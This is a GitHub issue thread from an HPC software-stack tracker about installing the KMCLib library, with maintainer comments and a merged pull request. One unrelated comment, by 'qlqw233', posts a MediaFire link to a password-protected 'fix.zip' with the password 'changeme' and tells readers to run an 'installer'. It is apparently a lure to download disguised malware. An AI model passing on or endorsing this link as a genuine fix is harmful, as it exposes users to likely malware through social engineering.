### ISSUE TITLE
KMCLib

### ISSUE THREAD

**Issue by laraPPr** [vscentrum/vsc-software-stack#400]
* link to support ticket: [#2024082360000722](https://otrsdict.ugent.be/otrs/index.pl?Action=AgentTicketZoom;TicketID=165706)
* website: https://github.com/leetmaa/KMCLib
* installation docs: http://leetmaa.github.io/KMCLib/manual-v1.1/install.html#run-the-python-tests
* toolchain: `foss/2023a` or older
* easyblock to use: `CMake`
* required dependencies:
  * [ ] ...
* optional dependencies:
  * [ ] ...
* notes:
  * ...
* effort: *(TBD)*
* other install methods
  * conda: yes (link?) / no
  * container image: yes (link?) / no
  * pre-built binaries (RHEL8 Linux x86_64): yes (link?) / no
  * easyconfig outside EasyBuild: yes / no

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by boegel** [comment]
@PetrKralCZ Can you take a look at this ASAP?

**Comment by PetrKralCZ** [comment]
- https://github.com/easybuilders/easybuild-easyconfigs/pull/21555

**Comment by boegel** [comment]
@PetrKralCZ PR merged & software installed, ready for cleanup
